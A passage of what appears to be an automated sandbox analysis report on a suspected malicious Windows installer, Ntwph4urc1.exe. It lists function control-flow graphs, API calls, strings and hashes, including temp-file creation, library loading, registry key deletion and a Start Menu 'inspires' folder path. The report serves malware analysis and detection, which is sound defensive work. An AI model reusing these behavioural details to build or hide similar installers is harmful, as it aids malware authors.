                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                            • GetLastError.KERNEL32 ref: 0040599B
                                            Strings
                                            • C:\Users\user\Desktop, xrefs: 00405925
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040594B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                                            • API String ID: 3449924974-2752704311
                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                            • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                            • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9
                                            Function 00406773 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 869 406773-406793 GetSystemDirectoryW 870 406795 869->870 871 406797-406799 869->871 870->871 872 4067aa-4067ac 871->872 873 40679b-4067a4 871->873 875 4067ad-4067e0 wsprintfW LoadLibraryExW 872->875 873->872 874 4067a6-4067a8 873->874 874->875
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                            • wsprintfW.USER32 ref: 004067C5
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\
                                            • API String ID: 2200240437-1946221925
                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                            • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                            • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8
                                            Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 876 40324c-403263 877 403265 876->877 878 40326c-403275 876->878 877->878 879 403277 878->879 880 40327e-403283 878->880 879->880 881 403293-4032a0 call 403444 880->881 882 403285-40328e call 40345a 880->882 886 403432 881->886 887 4032a6-4032aa 881->887 882->881 888 403434-403435 886->888 889 4032b0-4032d6 GetTickCount 887->889 890 4033dd-4033df 887->890 893 40343d-403441 888->893 894 40343a 889->894 895 4032dc-4032e4 889->895 891 4033e1-4033e4 890->891 892 40341f-403422 890->892 891->894 898 4033e6 891->898 896 403424 892->896 897 403427-403430 call 403444 892->897 894->893 899 4032e6 895->899 900 4032e9-4032f7 call 403444 895->900 896->897 897->886 908 403437 897->908 902 4033e9-4033ef 898->902 899->900 900->886 910 4032fd-403306 900->910 905 4033f1 902->905 906 4033f3-403401 call 403444 902->906 905->906 906->886 914 403403-40340f call 405f96 906->914 908->894 912 40330c-40332c call 40693e 910->912 917 403332-403345 GetTickCount 912->917 918 4033d5-4033d7 912->918 920 403411-40341b 914->920 921 4033d9-4033db 914->921 922 403390-403392 917->922 923 403347-40334f 917->923 918->888 920->902 924 40341d 920->924 921->888 927 403394-403398 922->927 928 4033c9-4033cd 922->928 925 403351-403355 923->925 926 403357-403388 MulDiv wsprintfW call 405456 923->926 924->894 925->922 925->926 933 40338d 926->933 931 40339a-4033a1 call 405f96 927->931 932 4033af-4033ba 927->932 928->895 929 4033d3 928->929 929->894 937 4033a6-4033a8 931->937 935 4033bd-4033c1 932->935 933->922 935->912 936 4033c7 935->936 936->894 937->921 938 4033aa-4033ad 937->938 938->935
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 551687249-2449383134
                                            • Opcode ID: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                            • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                            • Opcode Fuzzy Hash: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                            • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA
                                            Function 00405F13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 939 405f13-405f1f 940 405f20-405f54 GetTickCount GetTempFileNameW 939->940 941 405f63-405f65 940->941 942 405f56-405f58 940->942 944 405f5d-405f60 941->944 942->940 943 405f5a 942->943 943->944
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405F31
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Ntwph4urc1.exe",004034A0,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                            Strings
                                            • "C:\Users\user\Desktop\Ntwph4urc1.exe", xrefs: 00405F13
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F18
                                            • nsa, xrefs: 00405F20
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-2730080912
                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                            • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                            • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58
                                            Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 945 402e41-402e6a call 40625b 947 402e6f-402e73 945->947 948 402f24-402f28 947->948 949 402e79-402e7d 947->949 950 402ea2-402eb5 949->950 951 402e7f-402ea0 RegEnumValueW 949->951 953 402ede-402ee5 RegEnumKeyW 950->953 951->950 952 402f09-402f17 RegCloseKey 951->952 952->948 954 402eb7-402eb9 953->954 955 402ee7-402ef9 RegCloseKey call 4067e3 953->955 954->952 956 402ebb-402ecf call 402e41 954->956 961 402f19-402f1f 955->961 962 402efb-402f07 RegDeleteKeyW 955->962 956->955 963 402ed1-402edd 956->963 961->948 962->948 963->953
                                            APIs
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseEnum$DeleteValue
                                            • String ID:
                                            • API String ID: 1354259210-0
                                            • Opcode ID: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                            • Instruction ID: 6d47fb934da24c9d717e5f7ce43986d94c12ea4066fa177ccbd406c8c521aae0
                                            • Opcode Fuzzy Hash: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                            • Instruction Fuzzy Hash: D1215A71500109BBDF129F90CE89EEF7A7DEB54348F110076F909B21A0E7B49E54AAA8
                                            Function 74351777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 964 74351777-743517b6 call 74351b5f 968 743518d6-743518d8 964->968 969 743517bc-743517c0 964->969 970 743517c2-743517c8 call 7435239e 969->970 971 743517c9-743517d6 call 743523e0 969->971 970->971 976 74351806-7435180d 971->976 977 743517d8-743517dd 971->977 978 7435182d-74351831 976->978 979 7435180f-7435182b call 743525b5 call 743515b4 call 74351272 GlobalFree 976->979 980 743517df-743517e0 977->980 981 743517f8-743517fb 977->981 985 74351833-7435187c call 743515c6 call 743525b5 978->985 986 7435187e-74351884 call 743525b5 978->986 1002 74351885-74351889 979->1002 983 743517e2-743517e3 980->983 984 743517e8-743517e9 call 74352af8 980->984 981->976 987 743517fd-743517fe call 74352d83 981->987 990 743517e5-743517e6 983->990 991 743517f0-743517f6 call 74352770 983->991 997 743517ee 984->997 985->1002 986->1002 1000 74351803 987->1000 990->976 990->984 1001 74351805 991->1001 997->1000 1000->1001 1001->976 1006 743518c6-743518cd 1002->1006 1007 7435188b-74351899 call 74352578 1002->1007 1006->968 1012 743518cf-743518d0 GlobalFree 1006->1012 1014 743518b1-743518b8 1007->1014 1015 7435189b-7435189e 1007->1015 1012->968 1014->1006 1017 743518ba-743518c5 call 7435153d 1014->1017 1015->1014 1016 743518a0-743518a8 1015->1016 1016->1014 1018 743518aa-743518ab FreeLibrary 1016->1018 1017->1006 1018->1014
                                            APIs
                                              • Part of subcall function 74351B5F: GlobalFree.KERNEL32(?), ref: 74351DD4
                                              • Part of subcall function 74351B5F: GlobalFree.KERNEL32(?), ref: 74351DD9
                                              • Part of subcall function 74351B5F: GlobalFree.KERNEL32(?), ref: 74351DDE
                                            • GlobalFree.KERNEL32(00000000), ref: 74351825
                                            • FreeLibrary.KERNEL32(?), ref: 743518AB
                                            • GlobalFree.KERNELBASE(00000000), ref: 743518D0
                                              • Part of subcall function 7435239E: GlobalAlloc.KERNEL32(00000040,?), ref: 743523CF
                                              • Part of subcall function 74352770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,743517F6,00000000), ref: 74352840
                                              • Part of subcall function 743515C6: wsprintfW.USER32 ref: 743515F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                            • String ID:
                                            • API String ID: 3962662361-3916222277
                                            • Opcode ID: e3d3ceca58fc8a0ef5873696ef3434ac0afb494ef4009cf4ddb4893c80f653ba
                                            • Instruction ID: d2def95bea49923d283fe3badea2b06dfc7d8520e80c24c01d2ab8a2c8186967
                                            • Opcode Fuzzy Hash: e3d3ceca58fc8a0ef5873696ef3434ac0afb494ef4009cf4ddb4893c80f653ba
                                            • Instruction Fuzzy Hash: 21419172D002049AEF259F75D884F96F7BCBF04310F244565ED1F9A1A6DBB49385CBA0
                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,?,00405DE2,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D7C
                                              • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                              • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                              • Part of subcall function 00405925: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405968
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,00000000,000000F0), ref: 0040164D
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00401640
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                            • API String ID: 1892508949-2757888794
                                            • Opcode ID: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                            • Instruction ID: df70cc4d1a75ed244d2a997ae4edf05539497ac8b3a7dfb8588bf84231242a1b
                                            • Opcode Fuzzy Hash: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                            • Instruction Fuzzy Hash: 2811E231504104EBCF206FA5CD4099F37B0EF25329B28493BEA11B12F1D63E4A819B5E
                                            Function 004020D0 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                              • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                              • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                              • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,771B23A0), ref: 004054B1
                                              • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402189
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 334405425-0
                                            • Opcode ID: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                            • Instruction ID: a0686faca365a727748c0602422b19a99e1e577425e3ae8133f46283b43b75e6
                                            • Opcode Fuzzy Hash: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                            • Instruction Fuzzy Hash: 63219671600104EBCF10AFA5CE49A9E7A71AF55358F70413BF515B91E0CBBD8E829A2E
                                            Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
